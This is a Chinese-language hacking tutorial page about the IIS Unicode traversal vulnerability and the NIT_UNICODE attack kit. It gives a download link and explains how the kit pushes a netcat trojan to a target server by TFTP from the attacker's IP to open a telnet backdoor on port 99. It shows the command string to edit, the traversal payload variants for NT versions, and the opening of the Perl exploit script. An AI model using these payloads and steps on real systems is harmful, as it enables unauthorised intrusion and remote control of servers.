你的位置: 软件>> 网络安全宝典>> 防卫斗士>>


黑客技巧--深入UNICODE编码漏洞(五)
· badboy·

1 2 3  下一页

五、网络里可得到的一些UNICODE扫描程序的分析(续)

3、攻击型NIT_UNICODE软件套装

下载地址http://packetstorm.securify.com/0011-exploits/NIT_UNICODE.zip

压缩包里含有以下文件:
uni.pl -------扫描UNICODE编码漏洞的主PERL程序
uniexe.pl -----执行TFTP过程的PERL程序
ncx99.exe -----一个把telnet端口设置在99的netcat木马
tftpd32.exe -----TFTP设置软件
tftpd32.hlp -----帮助文件
flie_id.diz
vendinfo.diz
readme.file -----使用说明和例子

  该程序包主要利用unicode编码漏洞,把ncx99.exe上传到目标主机,并启动,使攻击者可以通过telnet 目标主机的99端口,登陆到目标主机上进行攻击行为。

  以下程序在使用时需要修改一些东西,找到$command="tftp -i .xxx.xxx.xxx GET ncx99.exe c:\\inetpub\\scripts\\nit.exe"; 这句,把xxx.xxx.xxx.xxx.xxx修改为你的IP地址,然后存盘。这句主要是把NCX99.EXE从你的主机改名传到目标主机c:\inetpub\scripts\去。另外还需要根据目标主机的NT版本,对程序里的..%c0%af..做相应的修改,比如说目标主机是WIN2K就修改为..%c1%1c..

#!/usr/bin/perl
# This is for educational purpose‘s only!
# WHO LET THEM DOGS OUT!
# Use uni.pl first to see if this is a vulnerable server!
# Based of the script unicodeexecute.pl from Roelof Temmngh
# Files=uniexe.pl,uni.pl,readme.file,tftpd32.exe,exploit.readme

use Socket;

if ($#ARGV<0) {die "Usage: uniexe.pl IP:port command\n";}
($host,$port)=split(/:/,@ARGV[0]);
$target = inet_aton($host);

1 2 3  下一页


感谢访问天极网,如果您觉得该文章涉及版权问题,请看这里!